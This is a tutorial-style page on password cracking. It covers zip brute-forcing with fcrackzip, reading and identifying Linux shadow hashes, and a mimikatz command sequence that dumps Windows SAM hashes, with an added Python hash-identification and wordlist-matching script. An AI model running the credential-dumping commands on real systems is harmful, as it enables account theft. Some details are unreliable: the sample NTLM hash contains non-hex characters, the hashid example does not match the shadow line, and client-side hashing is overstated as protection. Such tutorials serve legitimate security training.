Password Cracking

Cracking Zipped Files

fcrackzip is a fast password cracker partly written in assembler. It is able to crack password-protected zip files with brute-force or dictionary-based attacks, optionally verifying its results with unzip. It can also crack cpmask'ed images.

Password Hashes

Hashes are one-way mathematical functions that produce a fixed-size output (the size depends on the algorithm) that is, for practical purposes, unique for an input string of any length. They are useful for concealing the real password so that only the hash passes through the communication medium: instead of the user submitting the password through an encrypted channel to an application, the password is converted into a hash at the browser and the hash is submitted to the application, which compares it against the hash stored in the database for that user. Hence at no point, except at the JS level, is the user's password revealed.

Unfortunately there are different attacks on this scenario: read the password at the JS level, use the hash instead of the password, or crack the hash by trial and error. We are going to exploit the last method here.

In order to crack a hash, we first need to identify the type of hash, since there are many algorithms and combinations of methods that generate different hashes, and then compute hashes from a list of pre-defined password strings and compare them against the target.

Where can I find the hashes?

Linux

The password hash is stored in either the passwd or the shadow file in the /etc folder. A simple cat of the file can reveal the hash unless the file is read-protected. Here's a sample,

cracker:$y$j9T$ZK0bEZsSNBGw1Yv/kWge61$fp9tNqPvlPPksXAfy0zVlSTo0gfUWrX7rOZrHvqHvD.:19278:0:99999:7:::

The hash field (the second colon-separated column) can be taken out of this line and fed into the hashid command to identify the type of hash algorithm used, for example,

hashid '$6$T6lcJJcLaIi3KQ8k$SzDYMo2863hQQUz8o33O6.FzIx9QvjHz9Qrk/68PYKwNS3vHdcmWNeRhyegCv96QNYG5aAqUnK/zeP9cm2eqS/'
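The identification step and the dictionary comparison described above, as an added Python example (not part of the original page): it pulls the hash field out of a shadow line, identifies the algorithm from its $id$ prefix (or by digest length for raw hex hashes), and checks raw hashlib digests against a short constructed weak-password list, the same check an administrator would run to audit for weak passwords. The prefix table, the length table and the word list are assumptions of this example.

```python
import hashlib
import re

# Modular-crypt prefixes ("$id$...") as used in /etc/shadow (assumed table).
CRYPT_PREFIXES = {
    "$1$": "md5crypt",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$y$": "yescrypt",
}
# Raw hex digests can only be identified by length, and several algorithms
# share a length, so identify() returns a list of candidates for these.
HEX_LENGTHS = {32: ["md5", "ntlm"], 40: ["sha1"], 64: ["sha256"], 128: ["sha512"]}


def shadow_hash_field(line):
    """Return the hash field (second colon-separated column) of a shadow line."""
    return line.split(":")[1]


def identify(h):
    """Return candidate algorithm names for hash string h (empty if unknown)."""
    for prefix, name in CRYPT_PREFIXES.items():
        if h.startswith(prefix):
            return [name]
    if re.fullmatch(r"[0-9a-fA-F]+", h):
        return HEX_LENGTHS.get(len(h), [])
    return []


def weak_password_audit(h, wordlist):
    """Hash every word in wordlist with each candidate algorithm hashlib knows
    and return the word whose digest matches h, or None. Only raw hashlib
    digests are covered; crypt-style and NTLM hashes need a dedicated library."""
    target = h.lower()
    algos = [a for a in identify(h) if a in hashlib.algorithms_available]
    for word in wordlist:
        for algo in algos:
            if hashlib.new(algo, word.encode()).hexdigest() == target:
                return word
    return None


# Sample inputs: the shadow line shown above and a tiny constructed weak-password list.
SHADOW_LINE = ("cracker:$y$j9T$ZK0bEZsSNBGw1Yv/kWge61$fp9tNqPvlPPksXAfy0zVlSTo0gfUWrX7rOZrHvqHvD."
               ":19278:0:99999:7:::")
WEAK_WORDS = ["letmein", "123456", "password"]

if __name__ == "__main__":
    print(identify(shadow_hash_field(SHADOW_LINE)))  # ['yescrypt']
    md5_hash = hashlib.md5(b"password").hexdigest()    # constructed target hash
    print(identify(md5_hash), weak_password_audit(md5_hash, WEAK_WORDS))  # ['md5', 'ntlm'] password
```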

Windows

It is slightly more tricky on the Windows operating system, with the hashes stored locally and in Active Directory, if AD is used. We will use a tool called "mimikatz.exe" to retrieve password hashes. This tool is not available by default and has to be downloaded onto the system.

This tool has to be launched from a command prompt with administrative rights.

mimikatz.exe
// once the tool is running, the following commands have to be entered
privilege::debug
token::elevate
lsadump::sam

The last command should dump all the users along with their hashes as shown below,

User : victim
  Hash NTLM: 2892z26cdf84d9a70e2eb3y9f05c425e
